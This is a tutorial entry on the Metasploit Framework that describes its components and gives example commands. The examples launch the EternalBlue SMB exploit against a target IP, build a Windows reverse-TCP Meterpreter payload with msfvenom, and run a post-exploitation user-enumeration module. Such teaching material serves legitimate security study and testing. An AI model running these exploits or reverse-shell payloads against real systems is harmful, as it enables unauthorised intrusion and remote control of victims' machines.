1. Metasploit Framework

Description:
The Metasploit Framework is one of the most popular tools for exploitation. It includes a large number of exploits, payloads, auxiliary modules, and post-exploitation tools. Metasploit is highly extensible and can be used for tasks such as vulnerability scanning, exploitation, privilege escalation, and maintaining access.

Components of Metasploit:

      • msfconsole: The command-line interface for interacting with Metasploit, allowing users to execute commands, search exploits, and launch attacks.
      • msfvenom: A tool for generating payloads that can be used with exploits.
      • Exploit Modules: Modules used to exploit specific vulnerabilities.
      • Payloads: Code executed after the exploit succeeds. Payloads can provide shells, Meterpreter sessions, or execute other specific actions.
      • Post Modules: Used after exploitation to maintain access, gather information, escalate privileges, or clean up.

Examples:

  1. Start Metasploit Console:
      • msfconsole

Explanation: Launches the msfconsole command-line interface, the primary way of interacting with the Metasploit Framework.

  2. Search for an Exploit:
      • search exploit smb

Explanation: Searches for exploit modules related to SMB (Server Message Block) vulnerabilities.

  3. Select and Configure an Exploit:
      • use exploit/windows/smb/ms17_010_eternalblue
      • set RHOST 192.168.1.10
      • set LHOST 192.168.1.5
      • exploit

Explanation: Selects the EternalBlue exploit module, sets the target host (RHOST) and the attacker’s IP (LHOST), and finally runs the exploit command to launch the exploit.

  4. Generate a Payload using msfvenom:
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > payload.exe

Explanation: Generates a reverse TCP Meterpreter payload (windows/meterpreter/reverse_tcp) that connects back to the attacker’s IP (LHOST) on the given port (LPORT), and saves it as a Windows executable file (-f exe).

  5. Post-Exploitation Example:
      • use post/windows/gather/enum_logged_on_users
      • set SESSION 1
      • run

Explanation: Runs a post-exploitation module that enumerates logged-on users on a compromised Windows target. The session ID (SESSION) selects which existing session the module runs against.